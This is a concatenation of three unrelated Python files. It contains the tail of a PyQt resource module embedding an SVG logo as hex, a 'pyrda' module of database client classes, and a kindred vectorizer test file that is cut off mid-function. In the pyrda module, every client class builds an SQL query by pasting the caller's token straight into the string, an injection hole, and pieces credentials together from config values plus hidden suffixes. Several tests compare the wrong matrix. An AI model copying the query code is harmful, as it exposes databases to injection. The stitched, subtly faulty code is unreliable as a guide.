\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x22\x0d\x0a\x20\x20\
\x20\x6f\x62\x6a\x65\x63\x74\x74\x6f\x6c\x65\x72\x61\x6e\x63\x65\
\x3d\x22\x31\x30\x22\x0d\x0a\x20\x20\x20\x67\x72\x69\x64\x74\x6f\
\x6c\x65\x72\x61\x6e\x63\x65\x3d\x22\x31\x30\x22\x0d\x0a\x20\x20\
\x20\x67\x75\x69\x64\x65\x74\x6f\x6c\x65\x72\x61\x6e\x63\x65\x3d\
\x22\x31\x30\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\
\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\
\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0d\x0a\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0d\x0a\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\
\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x30\x31\x35\x22\
\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x6e\x61\x6d\x65\x64\x76\x69\
\x65\x77\x31\x33\x22\x0d\x0a\x20\x20\x20\x73\x68\x6f\x77\x67\x72\
\x69\x64\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x30\x2e\x36\
\x31\x36\x33\x31\x39\x34\x35\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x31\x35\x36\x2e\x37\x34\
\x31\x38\x36\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x63\x79\x3d\x22\x31\x30\x2e\x33\x31\x36\x38\x39\x32\x22\
\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\
\x65\x64\x3d\x22\x31\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\
\x72\x3d\x22\x63\x6f\x6e\x74\x65\x6e\x74\x22\x0d\x0a\x20\x20\x20\
\x73\x68\x6f\x77\x67\x75\x69\x64\x65\x73\x3d\x22\x66\x61\x6c\x73\
\x65\x22\x0d\x0a\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\
\x6e\x2d\x74\x6f\x70\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x66\x69\
\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x6c\x65\x66\x74\x3d\x22\x30\
\x22\x0d\x0a\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\
\x2d\x72\x69\x67\x68\x74\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x66\
\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\
\x3d\x22\x30\x22\x20\x2f\x3e\x0d\x0a\x3c\x73\x74\x79\x6c\x65\x0d\
\x0a\x20\x20\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x63\
\x73\x73\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x73\x74\x79\x6c\
\x65\x32\x22\x3e\x0d\x0a\x09\x2e\x73\x74\x30\x7b\x66\x69\x6c\x6c\
\x3a\x23\x32\x31\x32\x31\x32\x31\x3b\x7d\x0d\x0a\x09\x2e\x73\x74\
\x31\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\x38\x30\x41\x42\x3b\x7d\
\x0d\x0a\x09\x2e\x73\x74\x32\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\
\x31\x37\x34\x34\x3b\x7d\x0d\x0a\x3c\x2f\x73\x74\x79\x6c\x65\x3e\
\x0d\x0a\x3c\x67\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x67\x34\x35\
\x35\x34\x22\x0d\x0a\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\
\x6d\x3d\x22\x6d\x61\x74\x72\x69\x78\x28\x33\x2e\x35\x35\x35\x35\
\x35\x35\x36\x2c\x30\x2c\x30\x2c\x33\x2e\x35\x35\x35\x35\x35\x35\
\x36\x2c\x2d\x31\x34\x33\x2e\x31\x31\x31\x31\x31\x2c\x31\x34\x33\
\x2e\x31\x31\x31\x31\x31\x29\x22\x3e\x3c\x67\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x67\x31\x30\x22\x3e\x0d\x0a\x09\x3c\x70\
\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x34\x31\x63\x64\x35\x66\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\
\x31\x31\x37\x36\x34\x37\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\
\x70\x6f\x6c\x79\x67\x6f\x6e\x34\x22\x0d\x0a\x20\x20\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\
\x2d\x38\x20\x35\x36\x2c\x2d\x35\x36\x20\x32\x30\x30\x2c\x2d\x35\
\x36\x20\x22\x0d\x0a\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\x73\
\x74\x30\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x72\x65\x63\x74\x0d\x0a\
\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\
\x66\x66\x64\x38\x30\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\x34\x37\x22\x0d\
\x0a\x20\x20\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x36\x22\x0d\x0a\
\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x39\x36\x22\x0d\x0a\
\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\x22\x0d\x0a\
\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\x73\x74\x31\x22\x0d\x0a\
\x20\x20\x20\x79\x3d\x22\x2d\x38\x22\x0d\x0a\x20\x20\x20\x78\x3d\
\x22\x35\x36\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x70\x6f\x6c\x79\x67\
\x6f\x6e\x0d\x0a\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x39\x33\x39\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\
\x34\x37\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x70\x6f\x6c\x79\
\x67\x6f\x6e\x38\x22\x0d\x0a\x20\x20\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\x2d\x38\x20\x31\
\x32\x38\x2c\x38\x38\x20\x22\x0d\x0a\x20\x20\x20\x63\x6c\x61\x73\
\x73\x3d\x22\x73\x74\x32\x22\x20\x2f\x3e\x0d\x0a\x3c\x2f\x67\x3e\
\x3c\x2f\x67\x3e\x0d\x0a\x3c\x2f\x73\x76\x67\x3e\
"
qt_resource_name = b"\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x04\
\x00\x07\x35\xdf\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\
\x00\x0e\
\x0f\xfe\xfd\x07\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x5f\x00\x66\x00\x72\x00\x61\x00\x6d\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x05\xe2\x54\xa7\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x2e\x00\x73\x00\x76\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0e\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd2\
\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0e\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd2\
\x00\x00\x01\x74\x54\x97\xcd\xe2\
\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x74\x54\x97\xcd\xe2\
"
# Compare version components numerically so that e.g. Qt 5.10+ is not
# mistakenly treated as older than 5.8 by lexicographic string comparison.
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2

def qInitResources():
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

def qCleanupResources():
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

qInitResources()
# pyrda/dbms/rds.py (repo: takewiki/pyrda, license: Apache-2.0)
import pymssql
# local mode
# from pyrda.dbms.mssql import MsSqlClient
# from pyrda.dbms.mysql import MySqlClient
# from config import cfg_setting
# package mode
from .mssql import MsSqlClient
from .mysql import MySqlClient
from .config import cfg_setting

class RdClient(MsSqlClient):
    def __init__(self, token, as_dict=True):
        ip = cfg_setting['host'] + '8'
        user_name = cfg_setting['user']
        password = cfg_setting['password'] + '@'
        db_name = cfg_setting['database'] + 'gox'
        sql = cfg_setting['sql'] + " where FToken ='" + token + "'"
        connect = pymssql.connect(server=ip, user=user_name, password=password, database=db_name, as_dict=False, charset='cp936')
        cursor = connect.cursor()
        cursor.execute(sql)
        login = cursor.fetchall()  # fetch the query results
        cursor.close()  # close the cursor
        ncount = len(login)
        if ncount > 0:
            self.ip = login[0][0]
            self.user_name = login[0][1]
            self.password = login[0][2]
            self.db_name = login[0][3]
            self.port = login[0][4]
            self.dbType = login[0][5]
            self.FOwnerName = login[0][6]
            self.as_dict = as_dict
            MsSqlClient.__init__(self, ip=self.ip, port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name, as_dict=self.as_dict)

    def ownerName(self):
        return self.FOwnerName

class RdSqlServer(MsSqlClient):
    def __init__(self, token, as_dict=True):
        ip = cfg_setting['host'] + '8'
        user_name = cfg_setting['user']
        password = cfg_setting['password'] + '@'
        db_name = cfg_setting['database'] + 'gox'
        sql = cfg_setting['sql'] + " where FToken ='" + token + "'"
        connect = pymssql.connect(server=ip, user=user_name, password=password, database=db_name, as_dict=False, charset='cp936')
        cursor = connect.cursor()
        cursor.execute(sql)
        login = cursor.fetchall()  # fetch the query results
        cursor.close()  # close the cursor
        ncount = len(login)
        if ncount > 0:
            self.ip = login[0][0]
            self.user_name = login[0][1]
            self.password = login[0][2]
            self.db_name = login[0][3]
            self.port = login[0][4]
            self.dbType = login[0][5]
            self.FOwnerName = login[0][6]
            self.as_dict = as_dict
            MsSqlClient.__init__(self, ip=self.ip, port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name, as_dict=self.as_dict)

    def ownerName(self):
        return self.FOwnerName

class RdMsSql(MsSqlClient):
    def __init__(self, token, as_dict=True):
        ip = cfg_setting['host'] + '8'
        user_name = cfg_setting['user']
        password = cfg_setting['password'] + '@'
        db_name = cfg_setting['database'] + 'gox'
        sql = cfg_setting['sql'] + " where FToken ='" + token + "'"
        connect = pymssql.connect(server=ip, user=user_name, password=password, database=db_name, as_dict=False, charset='cp936')
        cursor = connect.cursor()
        cursor.execute(sql)
        login = cursor.fetchall()  # fetch the query results
        cursor.close()  # close the cursor
        ncount = len(login)
        if ncount > 0:
            self.ip = login[0][0]
            self.user_name = login[0][1]
            self.password = login[0][2]
            self.db_name = login[0][3]
            self.port = login[0][4]
            self.dbType = login[0][5]
            self.FOwnerName = login[0][6]
            self.as_dict = as_dict
            MsSqlClient.__init__(self, ip=self.ip, port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name, as_dict=self.as_dict)

    def ownerName(self):
        return self.FOwnerName

class RdMySql(MySqlClient):
    def __init__(self, token, as_dict=True):
        ip = cfg_setting['host'] + '8'
        user_name = cfg_setting['user']
        password = cfg_setting['password'] + '@'
        db_name = cfg_setting['database'] + 'gox'
        sql = cfg_setting['sql'] + " where FToken ='" + token + "'"
        connect = pymssql.connect(server=ip, user=user_name, password=password, database=db_name, as_dict=False, charset='cp936')
        cursor = connect.cursor()
        cursor.execute(sql)
        login = cursor.fetchall()  # fetch the query results
        cursor.close()  # close the cursor
        ncount = len(login)
        if ncount > 0:
            self.ip = login[0][0]
            self.user_name = login[0][1]
            self.password = login[0][2]
            self.db_name = login[0][3]
            self.port = login[0][4]
            self.dbType = login[0][5]
            self.FOwnerName = login[0][6]
            self.as_dict = as_dict
            MySqlClient.__init__(self, ip=self.ip, port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name)

    def ownerName(self):
        return self.FOwnerName

if __name__ == '__main__':
    pass
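# A minimal usage sketch, kept as comments. The token value below is a
# hypothetical placeholder; RdClient looks up the real connection details
# for that token from the central configuration database.
#
#     client = RdClient(token='demo-token')
#     print(client.ownerName())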
# tests/test_vectorizer.py (repo: vj1494/kindred, license: MIT)
import numpy as np
import kindred
import os
import json
from kindred.datageneration import generateData, generateTestData

def check(valueName, value):
    write = False

    scriptDir = os.path.dirname(__file__)
    jsonPath = os.path.join(scriptDir, 'data', 'vectorizer', 'expected.json')

    if os.path.isfile(jsonPath):
        with open(jsonPath) as f:
            data = json.load(f)
    else:
        data = {}

    if write:
        data[valueName] = value
        with open(jsonPath, 'w') as f:
            json.dump(data, f, indent=2, sort_keys=True)

    assert valueName in data
    assert data[valueName] == value

def test_simpleVectorizer_binary():
    text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer>. <drug id="3">Aspirin</drug> is the main cause of <disease id="4">boneitis</disease> . <relation type="treats" subj="1" obj="2" />'
    corpus = kindred.Corpus(text, loadFromSimpleTag=True)

    parser = kindred.Parser()
    parser.parse(corpus)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations = candidateBuilder.build(corpus)

    # We'll just get the vectors for the entityTypes
    vectorizer = kindred.Vectorizer(featureChoice=["entityTypes"])
    vectors = vectorizer.fit_transform(candidateRelations)
    vectorsCSR = vectors.tocsr()
    rows, cols = vectors.nonzero()

    expected = {(0, 2): 1.0, (0, 3): 1.0, (1, 0): 1.0, (1, 5): 1.0, (2, 2): 1.0, (2, 4): 1.0, (3, 1): 1.0, (3, 5): 1.0}

    namedCols = {str((r, c)): vectorsCSR[r, c] for r, c in zip(rows.tolist(), cols.tolist())}
    check('test_simpleVectorizer_binary', namedCols)

def test_simpleVectorizer_triple():
    text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer> which targets <gene id="3">EGFR</gene>. <relation type="druginfo" drug="1" disease="2" gene="3" />'
    corpus = kindred.Corpus(text, loadFromSimpleTag=True)

    parser = kindred.Parser()
    parser.parse(corpus)

    candidateBuilder = kindred.CandidateBuilder(entityCount=3)
    candidateRelations = candidateBuilder.build(corpus)

    # We'll just get the vectors for the entityTypes
    vectorizer = kindred.Vectorizer(entityCount=3, featureChoice=["entityTypes"])
    vectors = vectorizer.fit_transform(candidateRelations)
    vectorsCSR = vectors.tocsr()
    rows, cols = vectors.nonzero()

    expected = {(0, 1): 1.0, (0, 3): 1.0, (0, 8): 1.0, (1, 1): 1.0, (1, 5): 1.0, (1, 6): 1.0, (2, 0): 1.0, (2, 4): 1.0, (2, 8): 1.0, (3, 0): 1.0, (3, 5): 1.0, (3, 7): 1.0, (4, 2): 1.0, (4, 4): 1.0, (4, 6): 1.0, (5, 2): 1.0, (5, 3): 1.0, (5, 7): 1.0}

    namedCols = {str((r, c)): vectorsCSR[r, c] for r, c in zip(rows.tolist(), cols.tolist())}
    check('test_simpleVectorizer_triple', namedCols)

def test_vectorizer_defaults():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    vectorizer = kindred.Vectorizer()
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_defaults_1', namedCols1)

    colmeans2 = np.sum(matrix2, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_defaults_2', namedCols2)

def test_vectorizer_entityTypes():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["entityTypes"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=True)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_entityTypes_1', namedCols1)

    colmeans2 = np.sum(matrix2, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_entityTypes_2', namedCols2)

def test_vectorizer_unigramsBetweenEntities():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["unigramsBetweenEntities"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=True)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_unigramsBetweenEntities_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_unigramsBetweenEntities_2', namedCols2)

def test_vectorizer_bigrams():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["bigrams"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=True)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_bigrams_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_bigrams_2', namedCols2)

def test_vectorizer_dependencyPathEdges():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["dependencyPathEdges"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=True)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_dependencyPathEdges_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_dependencyPathEdges_2', namedCols2)

def test_vectorizer_dependencyPathEdgesNearEntities():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["dependencyPathEdgesNearEntities"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=True)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_dependencyPathEdgesNearEntities_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_dependencyPathEdgesNearEntities_2', namedCols2)

def test_vectorizer_entityTypes_noTFIDF():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["entityTypes"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=False)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_entityTypes_noTFIDF_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_entityTypes_noTFIDF_2', namedCols2)

def test_vectorizer_unigramsBetweenEntities_noTFIDF():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["unigramsBetweenEntities"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=False)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_unigramsBetweenEntities_noTFIDF_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_unigramsBetweenEntities_noTFIDF_2', namedCols2)

def test_vectorizer_bigrams_noTFIDF():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["bigrams"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=False)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_bigrams_noTFIDF_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_bigrams_noTFIDF_2', namedCols2)

def test_vectorizer_dependencyPathEdges_noTFIDF():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["dependencyPathEdges"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=False)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_dependencyPathEdges_noTFIDF_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_dependencyPathEdges_noTFIDF_2', namedCols2)

def test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF():
    corpus1, _ = generateTestData(positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder()
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    chosenFeatures = ["dependencyPathEdgesNearEntities"]
    vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures, tfidf=False)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
